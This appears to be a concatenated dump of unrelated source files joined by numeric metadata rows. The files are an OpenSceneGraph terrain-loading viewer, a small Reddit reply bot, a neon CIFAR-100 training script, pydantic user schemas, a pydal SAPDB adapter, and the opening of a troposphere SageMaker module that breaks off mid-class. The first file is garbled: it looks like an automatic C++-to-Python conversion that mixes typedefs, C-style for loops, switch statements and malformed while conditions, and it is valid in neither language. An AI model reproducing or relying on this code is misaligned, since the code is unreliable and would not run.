# osg.notify(osg.NOTICE), "First read ", filesA.size()
# itererate until the master file is stable
do
OpenThreads.Thread.microSleep(100000)
filesB.swap(filesA)
filesB.clear()
readMasterFile(filesB)
# osg.notify(osg.NOTICE), "second read ", filesB.size()
while filesA not =filesB :
files = Files()
files.swap(filesB)
# osg.notify(osg.NOTICE), "Now equal ", files.size()
newFiles = Files()
removedFiles = Files()
# find out which files are , and which ones have been removed.
lock = OpenThreads.ScopedLock<OpenThreads.Mutex>(_mutex)
for(Files.iterator fitr = files.begin()
not = files.end()
++fitr)
if _existingFilenameNodeMap.count(*fitr)==0 : newFiles.insert(*fitr)
for(FilenameNodeMap.iterator litr = _existingFilenameNodeMap.begin()
not = _existingFilenameNodeMap.end()
++litr)
if files.count(litr.first)==0 :
removedFiles.insert(litr.first)
#if 0
if not newFiles.empty() or not removedFiles.empty() :
osg.notify(osg.NOTICE), "void operator () files.size()=", files.size()
#endif
# first load the files.
nodesToAdd = FilenameNodeMap()
if not newFiles.empty() :
typedef std.vector< osg.GraphicsThread > GraphicsThreads
threads = GraphicsThreads()
for(unsigned int i=0 i<= osg.GraphicsContext.getMaxContextID() ++i)
gc = osg.GraphicsContext.getCompileContext(i)
gt = gc.getGraphicsThread() if (gc) else 0
if gt : threads.push_back(gt)
if _operationQueue.valid() :
# osg.notify(osg.NOTICE), "Using OperationQueue"
_endOfLoadBlock = osg.RefBlockCount(newFiles.size())
_endOfLoadBlock.reset()
typedef std.list< LoadAndCompileOperation > LoadAndCompileList
loadAndCompileList = LoadAndCompileList()
for(Files.iterator nitr = newFiles.begin()
not = newFiles.end()
++nitr)
# osg.notify(osg.NOTICE), "Adding LoadAndCompileOperation ", *nitr
loadAndCompile = LoadAndCompileOperation( *nitr, _incrementalCompileOperation, _endOfLoadBlock )
loadAndCompileList.push_back(loadAndCompile)
_operationQueue.add( loadAndCompile )
#if 1
operation = osg.Operation()
while operation=_operationQueue.getNextOperation() :.valid() :
# osg.notify(osg.NOTICE), "Local running of operation"
(*operation)(0)
#endif
# osg.notify(osg.NOTICE), "Waiting for completion of LoadAndCompile operations"
_endOfLoadBlock.block()
# osg.notify(osg.NOTICE), "done ... Waiting for completion of LoadAndCompile operations"
for(LoadAndCompileList.iterator litr = loadAndCompileList.begin()
not = loadAndCompileList.end()
++litr)
if *litr :._loadedModel.valid() :
nodesToAdd[(*litr)._filename] = (*litr)._loadedModel
else:
_endOfLoadBlock = osg.RefBlockCount(newFiles.size())
_endOfLoadBlock.reset()
for(Files.iterator nitr = newFiles.begin()
not = newFiles.end()
++nitr)
loadedModel = osgDB.readNodeFile(*nitr)
if loadedModel :
nodesToAdd[*nitr] = loadedModel
if _incrementalCompileOperation.valid() :
compileSet = osgUtil.IncrementalCompileOperation.CompileSet(loadedModel)
compileSet._compileCompletedCallback = ReleaseBlockOnCompileCompleted(_endOfLoadBlock)
_incrementalCompileOperation.add(compileSet)
else:
_endOfLoadBlock.completed()
else:
_endOfLoadBlock.completed()
_endOfLoadBlock.block()
requiresBlock = False
# pass the locally peppared data to MasterOperations shared data
# so that updated thread can merge these changes with the main scene
# graph. This merge is carried out via the update(..) method.
if not removedFiles.empty() or not nodesToAdd.empty() :
lock = OpenThreads.ScopedLock<OpenThreads.Mutex>(_mutex)
_nodesToRemove.swap(removedFiles)
_nodesToAdd.swap(nodesToAdd)
requiresBlock = True
# now block so we don't try to load anything till the data has been merged
# otherwise _existingFilenameNodeMap will get out of sync.
if requiresBlock :
_updatesMergedBlock.block()
else:
OpenThreads.Thread.YieldCurrentThread()
# merge the changes with the main scene graph.
def update(scene):
# osg.notify(osg.NOTICE), "void update(Node*)"
group = dynamic_cast<osg.Group*>(scene)
if not group :
osg.notify(osg.NOTICE), "Error, MasterOperation.update(Node*) can only work with a Group as Viewer.getSceneData()."
return
lock = OpenThreads.ScopedLock<OpenThreads.Mutex>(_mutex)
if not _nodesToRemove.empty() or not _nodesToAdd.empty() :
osg.notify(osg.NOTICE), "update().................. "
if not _nodesToRemove.empty() :
for(Files.iterator itr = _nodesToRemove.begin()
not = _nodesToRemove.end()
++itr)
fnmItr = _existingFilenameNodeMap.find(*itr)
if fnmItr not = _existingFilenameNodeMap.end() :
osg.notify(osg.NOTICE), " update():removing ", *itr
group.removeChild(fnmItr.second)
_existingFilenameNodeMap.erase(fnmItr)
_nodesToRemove.clear()
if not _nodesToAdd.empty() :
for(FilenameNodeMap.iterator itr = _nodesToAdd.begin()
not = _nodesToAdd.end()
++itr)
osg.notify(osg.NOTICE), " update():inserting ", itr.first
group.addChild(itr.second)
_existingFilenameNodeMap[itr.first] = itr.second
_nodesToAdd.clear()
_updatesMergedBlock.release()
# add release implementation so that any thread cancellation can
# work even when blocks and barriers are used.
def release():
if _operationQueue.valid() : _operationQueue.removeAllOperations()
_updatesMergedBlock.release()
if _endOfCompilebarrier.valid() : _endOfCompilebarrier.release()
if _endOfLoadBlock.valid() : _endOfLoadBlock.release()
_filename = str()
_mutex = OpenThreads.Mutex()
_existingFilenameNodeMap = FilenameNodeMap()
_nodesToRemove = Files()
_nodesToAdd = FilenameNodeMap()
_updatesMergedBlock = OpenThreads.Block()
_incrementalCompileOperation = osgUtil.IncrementalCompileOperation()
_endOfCompilebarrier = osg.BarrierOperation()
_endOfLoadBlock = osg.RefBlockCount()
_operationQueue = osg.OperationQueue()
class FilterHandler (osgGA.GUIEventHandler) :
FilterHandler(osgTerrain.GeometryTechnique* gt):
_gt(gt)
def handle(ea, aa):
if not _gt : return False
switch(ea.getEventType())
case(osgGA.GUIEventAdapter.KEYDOWN):
if ea.getKey() == ord("g") :
osg.notify(osg.NOTICE), "Gaussian"
_gt.setFilterMatrixAs(osgTerrain.GeometryTechnique.GAUSSIAN)
return True
elif ea.getKey() == ord("s") :
osg.notify(osg.NOTICE), "Smooth"
_gt.setFilterMatrixAs(osgTerrain.GeometryTechnique.SMOOTH)
return True
elif ea.getKey() == ord("S") :
osg.notify(osg.NOTICE), "Sharpen"
_gt.setFilterMatrixAs(osgTerrain.GeometryTechnique.SHARPEN)
return True
elif ea.getKey() == ord("+") :
_gt.setFilterWidth(_gt.getFilterWidth()*1.1)
osg.notify(osg.NOTICE), "Filter width = ", _gt.getFilterWidth()
return True
elif ea.getKey() == ord("-") :
_gt.setFilterWidth(_gt.getFilterWidth()/1.1)
osg.notify(osg.NOTICE), "Filter width = ", _gt.getFilterWidth()
return True
elif ea.getKey() == ord(">") :
_gt.setFilterBias(_gt.getFilterBias()+0.1)
osg.notify(osg.NOTICE), "Filter bias = ", _gt.getFilterBias()
return True
elif ea.getKey() == ord("<") :
_gt.setFilterBias(_gt.getFilterBias()-0.1)
osg.notify(osg.NOTICE), "Filter bias = ", _gt.getFilterBias()
return True
break
default:
break
return False
_gt = osg.observer_ptr<osgTerrain.GeometryTechnique>()
class LayerHandler (osgGA.GUIEventHandler) :
LayerHandler(osgTerrain.Layer* layer):
_layer(layer)
def handle(ea, aa):
if not _layer : return False
scale = 1.2
switch(ea.getEventType())
case(osgGA.GUIEventAdapter.KEYDOWN):
if ea.getKey() == ord("q") :
_layer.transform(0.0, scale)
return True
elif ea.getKey() == ord("a") :
_layer.transform(0.0, 1.0/scale)
return True
break
default:
break
return False
_layer = osg.observer_ptr<osgTerrain.Layer>()
def main(argv):
arguments = osg.ArgumentParser(argv)
# construct the viewer.
viewer = osgViewer.Viewer(arguments)
# set up the camera manipulators.
keyswitchManipulator = osgGA.KeySwitchMatrixManipulator()
keyswitchManipulator.addMatrixManipulator( ord("1"), "Trackball", osgGA.TrackballManipulator() )
keyswitchManipulator.addMatrixManipulator( ord("2"), "Flight", osgGA.FlightManipulator() )
keyswitchManipulator.addMatrixManipulator( ord("3"), "Drive", osgGA.DriveManipulator() )
keyswitchManipulator.addMatrixManipulator( ord("4"), "Terrain", osgGA.TerrainManipulator() )
pathfile = str()
keyForAnimationPath = ord("5")
while arguments.read("-p",pathfile) :
apm = osgGA.AnimationPathManipulator(pathfile)
if apm or not apm.valid() :
num = keyswitchManipulator.getNumMatrixManipulators()
keyswitchManipulator.addMatrixManipulator( keyForAnimationPath, "Path", apm )
keyswitchManipulator.selectMatrixManipulator(num)
++keyForAnimationPath
viewer.setCameraManipulator( keyswitchManipulator )
# add the state manipulator
viewer.addEventHandler( osgGA.StateSetManipulator(viewer.getCamera().getOrCreateStateSet()) )
# add the stats handler
viewer.addEventHandler(osgViewer.StatsHandler)()
# add the record camera path handler
viewer.addEventHandler(osgViewer.RecordCameraPathHandler)()
# attach an IncrementaCompileOperation to allow the master loading
# to be handled with an incremental compile to avoid frame drops when large objects are added.
viewer.setIncrementalCompileOperation(osgUtil.IncrementalCompileOperation())
x = 0.0
y = 0.0
w = 1.0
h = 1.0
numLoadThreads = 1
while arguments.read("--load-threads",numLoadThreads) :
masterOperation = MasterOperation()
masterFilename = str()
while arguments.read("-m",masterFilename) :
masterOperation = MasterOperation(masterFilename, viewer.getIncrementalCompileOperation())
terrainTile = osgTerrain.TerrainTile()
locator = osgTerrain.Locator()
validDataOperator = osgTerrain.NoDataValue(0.0)
lastAppliedLayer = osgTerrain.Layer()
locator.setCoordinateSystemType(osgTerrain.Locator.GEOCENTRIC)
locator.setTransformAsExtents(-osg.PI, -osg.PI*0.5, osg.PI, osg.PI*0.5)
layerNum = 0
filterName = str()
filter = osg.Texture.LINEAR
float minValue, maxValue
scale = 1.0
offset = 0.0
pos = 1
while pos<arguments.argc() :
filename = str()
if arguments.read(pos, "--layer",layerNum) :
osg.notify(osg.NOTICE), "Set layer number to ", layerNum
elif arguments.read(pos, "-b") :
terrainTile.setTreatBoundariesToValidDataAsDefaultValue(True)
elif arguments.read(pos, "-e",x,y,w,h) :
# define the extents.
locator.setCoordinateSystemType(osgTerrain.Locator.GEOCENTRIC)
locator.setTransformAsExtents(x,y,x+w,y+h)
elif arguments.read(pos, "--transform",offset, scale) or arguments.read(pos, "-t",offset, scale) :
# define the extents.
elif arguments.read(pos, "--cartesian",x,y,w,h) :
# define the extents.
locator.setCoordinateSystemType(osgTerrain.Locator.PROJECTED)
locator.setTransformAsExtents(x,y,x+w,y+h)
elif arguments.read(pos, "--hf",filename) :
osg.notify(osg.NOTICE), "--hf ", filename
hf = osgDB.readHeightFieldFile(filename)
if hf.valid() :
hfl = osgTerrain.HeightFieldLayer()
hfl.setHeightField(hf)
hfl.setLocator(locator)
hfl.setValidDataOperator(validDataOperator)
hfl.setMagFilter(filter)
if offset not =0.0 or scale not =1.0 :
hfl.transform(offset,scale)
terrainTile.setElevationLayer(hfl)
lastAppliedLayer = hfl
osg.notify(osg.NOTICE), "created osgTerrain.HeightFieldLayer"
else:
osg.notify(osg.NOTICE), "failed to create osgTerrain.HeightFieldLayer"
scale = 1.0
offset = 0.0
elif arguments.read(pos, "-d",filename) or arguments.read(pos, "--elevation-image",filename) :
osg.notify(osg.NOTICE), "--elevation-image ", filename
image = osgDB.readImageFile(filename)
if image.valid() :
imageLayer = osgTerrain.ImageLayer()
imageLayer.setImage(image)
imageLayer.setLocator(locator)
imageLayer.setValidDataOperator(validDataOperator)
imageLayer.setMagFilter(filter)
if offset not =0.0 or scale not =1.0 :
imageLayer.transform(offset,scale)
terrainTile.setElevationLayer(imageLayer)
lastAppliedLayer = imageLayer
osg.notify(osg.NOTICE), "created Elevation osgTerrain.ImageLayer"
else:
osg.notify(osg.NOTICE), "failed to create osgTerrain.ImageLayer"
scale = 1.0
offset = 0.0
elif arguments.read(pos, "-c",filename) or arguments.read(pos, "--image",filename) :
osg.notify(osg.NOTICE), "--image ", filename, " x=", x, " y=", y, " w=", w, " h=", h
image = osgDB.readImageFile(filename)
if image.valid() :
imageLayer = osgTerrain.ImageLayer()
imageLayer.setImage(image)
imageLayer.setLocator(locator)
imageLayer.setValidDataOperator(validDataOperator)
imageLayer.setMagFilter(filter)
if offset not =0.0 or scale not =1.0 :
imageLayer.transform(offset,scale)
terrainTile.setColorLayer(layerNum, imageLayer)
lastAppliedLayer = imageLayer
osg.notify(osg.NOTICE), "created Color osgTerrain.ImageLayer"
else:
osg.notify(osg.NOTICE), "failed to create osgTerrain.ImageLayer"
scale = 1.0
offset = 0.0
elif arguments.read(pos, "--filter",filterName) :
if filterName=="NEAREST" :
osg.notify(osg.NOTICE), "--filter ", filterName
filter = osg.Texture.NEAREST
elif filterName=="LINEAR" :
filter = osg.Texture.LINEAR
osg.notify(osg.NOTICE), "--filter ", filterName
else:
osg.notify(osg.NOTICE), "--filter ", filterName, " unrecognized filter name, please use LINEAER or NEAREST."
if terrainTile.getColorLayer(layerNum) :
terrainTile.getColorLayer(layerNum).setMagFilter(filter)
elif arguments.read(pos, "--tf",minValue, maxValue) :
tf = osg.TransferFunction1D()
numCells = 6
delta = (maxValue-minValue)/float(numCells-1)
v = minValue
tf.allocate(6)
tf.setColor(v, osg.Vec4(1.0,1.0,1.0,1.0)) v += delta
tf.setColor(v, osg.Vec4(1.0,0.0,1.0,1.0)) v += delta
tf.setColor(v, osg.Vec4(1.0,0.0,0.0,1.0)) v += delta
tf.setColor(v, osg.Vec4(1.0,1.0,0.0,1.0)) v += delta
tf.setColor(v, osg.Vec4(0.0,1.0,1.0,1.0)) v += delta
tf.setColor(v, osg.Vec4(0.0,1.0,0.0,1.0))
osg.notify(osg.NOTICE), "--tf ", minValue, " ", maxValue
terrainTile.setColorLayer(layerNum, osgTerrain.ContourLayer(tf))
else:
++pos
scene = osg.Group()
if terrainTile.valid() and (terrainTile.getElevationLayer() or terrainTile.getColorLayer(0)) :
osg.notify(osg.NOTICE), "Terrain created"
scene.addChild(terrainTile)
geometryTechnique = osgTerrain.GeometryTechnique()
terrainTile.setTerrainTechnique(geometryTechnique)
viewer.addEventHandler(FilterHandler(geometryTechnique))
viewer.addEventHandler(LayerHandler(lastAppliedLayer))
if masterOperation.valid() :
osg.notify(osg.NOTICE), "Master operation created"
masterOperation.open(scene)
if scene.getNumChildren()==0 :
osg.notify(osg.NOTICE), "No model created, please specify terrain or master file on command line."
return 0
viewer.setSceneData(scene)
# start operation thread if a master file has been used.
masterOperationThread = osg.OperationThread()
typedef std.list< osg.OperationThread > OperationThreadList
generalThreadList = OperationThreadList()
if masterOperation.valid() :
masterOperationThread = osg.OperationThread()
masterOperationThread.startThread()
masterOperationThread.add(masterOperation)
# if numLoadThreads>0 :
operationQueue = osg.OperationQueue()
masterOperation.setOperationQueue(operationQueue)
for(unsigned int i=0 i<numLoadThreads ++i)
thread = osg.OperationThread()
thread.setOperationQueue(operationQueue)
thread.startThread()
generalThreadList.push_back(thread)
viewer.addUpdateOperation(masterOperation)
viewer.setThreadingModel(osgViewer.Viewer.SingleThreaded)
# enable the use of compile contexts and associated threads.
# osg.DisplaySettings.instance().setCompileContextsHint(True)
# realize the graphics windows.
viewer.realize()
# run the viewers main loop
return viewer.run()
if __name__ == "__main__":
main(sys.argv)
| 34.661458 | 130 | 0.598911 | 2,423 | 26,620 | 6.526207 | 0.215848 | 0.024474 | 0.032631 | 0.048947 | 0.273509 | 0.222665 | 0.174856 | 0.156707 | 0.148991 | 0.144818 | 0 | 0.007858 | 0.306837 | 26,620 | 767 | 131 | 34.706649 | 0.849122 | 0 | 0 | 0.294521 | 0 | 0 | 0.045928 | 0.009662 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.020548 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
482697dcf4d097846528ae15ee8dbca33b6e86d7 | 525 | py | Python | splunge.py | neilebliss/reddit_bot | 74be4b57ddbdf9fe0d9876207388ee2778b4a50d | [
"Unlicense"
] | null | null | null | splunge.py | neilebliss/reddit_bot | 74be4b57ddbdf9fe0d9876207388ee2778b4a50d | [
"Unlicense"
] | null | null | null | splunge.py | neilebliss/reddit_bot | 74be4b57ddbdf9fe0d9876207388ee2778b4a50d | [
"Unlicense"
] | null | null | null | import praw
import re
import os
reddit = praw.Reddit('Splunge Bot v1', client_id=os.environ['REDDIT_CLIENT_ID'], client_secret=os.environ['REDDIT_CLIENT_SECRET'], password=os.environ['REDDIT_PASSWORD'], username=os.environ['REDDIT_USERNAME'])
subreddit = reddit.subreddit('tubasaur')
for submission in subreddit.new(limit=5):
for top_level_comment in submission.comments:
if re.search('splunge', top_level_comment.body, re.IGNORECASE):
top_level_comment.reply("Well, yeah, splunge for me too!")
print("Splunged.")
| 40.384615 | 210 | 0.775238 | 76 | 525 | 5.171053 | 0.486842 | 0.091603 | 0.152672 | 0.10687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004193 | 0.091429 | 525 | 12 | 211 | 43.75 | 0.819707 | 0 | 0 | 0 | 0 | 0 | 0.257634 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.1 | 0.3 | 0 | 0.3 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
482da58116dfb913fbea2c87dc9df1955becba11 | 3,528 | py | Python | code/a_train_generalist.py | seba-1511/specialists | 9888e639707142db80aafe6ae7bf25f572d34505 | [
"Apache-2.0"
] | 1 | 2016-05-31T07:54:31.000Z | 2016-05-31T07:54:31.000Z | code/a_train_generalist.py | seba-1511/specialists | 9888e639707142db80aafe6ae7bf25f572d34505 | [
"Apache-2.0"
] | null | null | null | code/a_train_generalist.py | seba-1511/specialists | 9888e639707142db80aafe6ae7bf25f572d34505 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This file is an experiment that will train a specified generalist network.
"""
import random
import numpy as np
from neon.backends import gen_backend
from neon.data import DataIterator, load_cifar10
from neon.transforms.cost import Misclassification
from neon.callbacks.callbacks import Callbacks
from neon.util.argparser import NeonArgparser
from neon.util.persist import save_obj
from keras.datasets import cifar100
from cifar_net import get_custom_vgg
# parse the command line arguments
parser = NeonArgparser(__doc__)
args = parser.parse_args()
DATASET_NAME = 'cifar100'
EXPERIMENT_DIR = 'experiments/' + DATASET_NAME + '/'
VALIDATION = True
def split_train_set(X_train, y_train):
return (X_train[:-5000], y_train[:-5000]), (X_train[-5000:], y_train[-5000:])
def load_data(name):
if name == 'cifar10':
(X_train, y_train), (X_test, y_test), nout = load_cifar10(path=args.data_dir)
nout = 16
elif name == 'cifar100':
(X_train, y_train), (X_test, y_test) = cifar100.load_data(label_mode='fine')
X_train = X_train.reshape(50000, 3072)
X_test = X_test.reshape(10000, 3072)
nout = 128
elif name == 'svhn':
from scipy.io import loadmat
train = loadmat('../data/svhm_train.mat')
test = loadmat('../data/svhn_test.mat')
(X_train, y_train), (X_test, y_test) = (train['X'], train['y']), (test['X'], test['y'])
s = X_train.shape
X_train = X_train.reshape(-1, s[-1]).transpose()
s = X_test.shape
X_test = X_test.reshape(-1, s[-1]).transpose()
temp = np.empty(X_train.shape, dtype=np.uint)
np.copyto(temp, X_train)
X_train = temp
temp = np.empty(X_test.shape, dtype=np.uint)
np.copyto(temp, X_test)
X_test = temp
nout = 16
return (X_train, y_train), (X_test, y_test), nout
if __name__ == '__main__':
# hyperparameters
batch_size = 64
num_epochs = args.epochs
num_epochs = 74 if num_epochs == 10 else num_epochs
rng_seed = 1234
np.random.seed(rng_seed)
random.seed(rng_seed)
# setup backend
be = gen_backend(
backend=args.backend,
batch_size=batch_size,
rng_seed=rng_seed,
device_id=args.device_id,
default_dtype=args.datatype,
)
(X_train, y_train), (X_test, y_test), nout = load_data(DATASET_NAME)
if VALIDATION:
(X_train, y_train), (X_valid, y_valid) = split_train_set(X_train, y_train)
model, opt, cost = get_custom_vgg(nout=nout)
train_set = DataIterator(X_train, y_train, nclass=nout, lshape=(3, 32, 32))
test_set = DataIterator(X_test, y_test, nclass=nout, lshape=(3, 32, 32))
callbacks = Callbacks(model, train_set, args, eval_set=test_set)
if VALIDATION:
valid_set = DataIterator(X_valid, y_valid, nclass=nout, lshape=(3, 32, 32))
callbacks = Callbacks(model, train_set, args, eval_set=valid_set)
model.fit(train_set, optimizer=opt, num_epochs=num_epochs, cost=cost, callbacks=callbacks)
print 'Validation: ', VALIDATION
print 'Train misclassification error: ', model.eval(train_set, metric=Misclassification())
if VALIDATION:
print 'Valid misclassification error: ', model.eval(valid_set, metric=Misclassification())
print 'Test misclassification error: ', model.eval(test_set, metric=Misclassification())
if args.save_path is not None:
save_obj(model.serialize(), EXPERIMENT_DIR + args.save_path)
| 33.283019 | 98 | 0.67602 | 505 | 3,528 | 4.473267 | 0.269307 | 0.053121 | 0.030987 | 0.047809 | 0.236388 | 0.188136 | 0.161133 | 0.139 | 0.093847 | 0.082337 | 0 | 0.031628 | 0.202381 | 3,528 | 105 | 99 | 33.6 | 0.771144 | 0.029762 | 0 | 0.066667 | 0 | 0 | 0.06087 | 0.012894 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.146667 | null | null | 0.053333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4834a12f8b0a1adc974a9695986c5da1d9c04010 | 603 | py | Python | repost/api/schemas/user.py | pckv/fastapi-backend | 0f561528086ac3fdcabbf9efeac888421eeb66de | [
"MIT"
] | 9 | 2020-02-03T11:17:06.000Z | 2021-06-15T13:20:34.000Z | repost/api/schemas/user.py | pckv/fastapi-backend | 0f561528086ac3fdcabbf9efeac888421eeb66de | [
"MIT"
] | 40 | 2020-02-03T11:23:59.000Z | 2020-05-19T08:05:41.000Z | repost/api/schemas/user.py | pckv/fastapi-backend | 0f561528086ac3fdcabbf9efeac888421eeb66de | [
"MIT"
] | 1 | 2020-03-11T02:47:40.000Z | 2020-03-11T02:47:40.000Z | """API schemas for users."""
from datetime import datetime
from typing import Optional
from pydantic import BaseModel
class User(BaseModel):
"""Schema for a user account"""
username: str
bio: Optional[str]
avatar_url: Optional[str]
created: datetime
edited: Optional[datetime]
class Config:
orm_mode = True
class CreateUser(BaseModel):
"""Schema for creating a new user account"""
username: str
password: str
class EditUser(BaseModel):
"""Schema for editing a user account"""
bio: Optional[str] = None
avatar_url: Optional[str] = None
| 20.1 | 48 | 0.681592 | 75 | 603 | 5.44 | 0.453333 | 0.107843 | 0.132353 | 0.107843 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.223881 | 603 | 29 | 49 | 20.793103 | 0.871795 | 0.200663 | 0 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.058824 | 0.176471 | 0 | 0.941176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
483592e4049e6951c186723536311a58d0a2c2a3 | 1,459 | py | Python | gluon/packages/dal/pydal/adapters/sap.py | GeorgesBrantley/ResistanceGame | 65ec925ec8399af355e176c4814a749fde5f907d | [
"BSD-3-Clause"
] | 408 | 2015-01-01T10:31:47.000Z | 2022-03-26T17:41:21.000Z | gluon/packages/dal/pydal/adapters/sap.py | GeorgesBrantley/ResistanceGame | 65ec925ec8399af355e176c4814a749fde5f907d | [
"BSD-3-Clause"
] | 521 | 2015-01-08T14:45:54.000Z | 2022-03-24T11:15:22.000Z | gluon/packages/dal/pydal/adapters/sap.py | GeorgesBrantley/ResistanceGame | 65ec925ec8399af355e176c4814a749fde5f907d | [
"BSD-3-Clause"
] | 158 | 2015-01-25T20:02:00.000Z | 2022-03-01T06:29:12.000Z | import re
from .._compat import integer_types, long
from .base import SQLAdapter
from . import adapters
@adapters.register_for("sapdb")
class SAPDB(SQLAdapter):
dbengine = "sapdb"
drivers = ("sapdb",)
REGEX_URI = (
"^(?P<user>[^:@]+)(:(?P<password>[^@]*))?"
r"@(?P<host>[^:/]+|\[[^\]]+\])/(?P<db>[^?]+)$"
)
def _initialize_(self):
super(SAPDB, self)._initialize_()
ruri = self.uri.split("://", 1)[1]
m = re.match(self.REGEX_URI, ruri)
if not m:
raise SyntaxError("Invalid URI string in DAL")
user = self.credential_decoder(m.group("user"))
password = self.credential_decoder(m.group("password"))
if password is None:
password = ""
host = m.group("host")
db = m.group("db")
self.driver_args.update(user=user, password=password, database=db, host=host)
def connector(self):
self.driver.connect(**self.driver_args)
def lastrowid(self, table):
self.execute("select %s.NEXTVAL from dual" % table._sequence_name)
return long(self.cursor.fetchone()[0])
def create_sequence_and_triggers(self, query, table, **args):
self.execute("CREATE SEQUENCE %s;" % table._sequence_name)
self.execute(
"ALTER TABLE %s ALTER COLUMN %s SET DEFAULT NEXTVAL('%s');"
% (table._rname, table._id._rname, table._sequence_name)
)
self.execute(query)
| 32.422222 | 85 | 0.592186 | 175 | 1,459 | 4.794286 | 0.428571 | 0.028605 | 0.060787 | 0.052443 | 0.131108 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002712 | 0.241947 | 1,459 | 44 | 86 | 33.159091 | 0.755877 | 0 | 0 | 0 | 0 | 0 | 0.169294 | 0.056888 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0.135135 | 0.108108 | 0 | 0.351351 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4836dce172471538808ff516434e702497a39d34 | 39,841 | py | Python | troposphere/sagemaker.py | filipepmo/troposphere | b1590f58ed8cc86ba18a19ed93fc9380d6f7306b | [
"BSD-2-Clause"
] | null | null | null | troposphere/sagemaker.py | filipepmo/troposphere | b1590f58ed8cc86ba18a19ed93fc9380d6f7306b | [
"BSD-2-Clause"
] | null | null | null | troposphere/sagemaker.py | filipepmo/troposphere | b1590f58ed8cc86ba18a19ed93fc9380d6f7306b | [
"BSD-2-Clause"
] | null | null | null | # Copyright (c) 2012-2022, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
#
# *** Do not modify - this file is autogenerated ***
# Resource specification version: 51.0.0
from . import AWSObject, AWSProperty, PropsDictType, Tags
from .validators import boolean, double, integer
class ResourceSpec(AWSProperty):
"""
`ResourceSpec <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-userprofile-resourcespec.html>`__
"""
props: PropsDictType = {
"InstanceType": (str, False),
"SageMakerImageArn": (str, False),
"SageMakerImageVersionArn": (str, False),
}
class App(AWSObject):
"""
`App <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-app.html>`__
"""
resource_type = "AWS::SageMaker::App"
props: PropsDictType = {
"AppName": (str, True),
"AppType": (str, True),
"DomainId": (str, True),
"ResourceSpec": (ResourceSpec, False),
"Tags": (Tags, False),
"UserProfileName": (str, True),
}
class FileSystemConfig(AWSProperty):
"""
`FileSystemConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-appimageconfig-filesystemconfig.html>`__
"""
props: PropsDictType = {
"DefaultGid": (integer, False),
"DefaultUid": (integer, False),
"MountPath": (str, False),
}
class KernelSpec(AWSProperty):
"""
`KernelSpec <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-appimageconfig-kernelspec.html>`__
"""
props: PropsDictType = {
"DisplayName": (str, False),
"Name": (str, True),
}
class KernelGatewayImageConfig(AWSProperty):
"""
`KernelGatewayImageConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-appimageconfig-kernelgatewayimageconfig.html>`__
"""
props: PropsDictType = {
"FileSystemConfig": (FileSystemConfig, False),
"KernelSpecs": ([KernelSpec], True),
}
class AppImageConfig(AWSObject):
"""
`AppImageConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-appimageconfig.html>`__
"""
resource_type = "AWS::SageMaker::AppImageConfig"
props: PropsDictType = {
"AppImageConfigName": (str, True),
"KernelGatewayImageConfig": (KernelGatewayImageConfig, False),
"Tags": (Tags, False),
}
class GitConfig(AWSProperty):
"""
`GitConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-coderepository-gitconfig.html>`__
"""
props: PropsDictType = {
"Branch": (str, False),
"RepositoryUrl": (str, True),
"SecretArn": (str, False),
}
class CodeRepository(AWSObject):
"""
`CodeRepository <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-coderepository.html>`__
"""
resource_type = "AWS::SageMaker::CodeRepository"
props: PropsDictType = {
"CodeRepositoryName": (str, False),
"GitConfig": (GitConfig, True),
"Tags": (Tags, False),
}
class DataQualityAppSpecification(AWSProperty):
"""
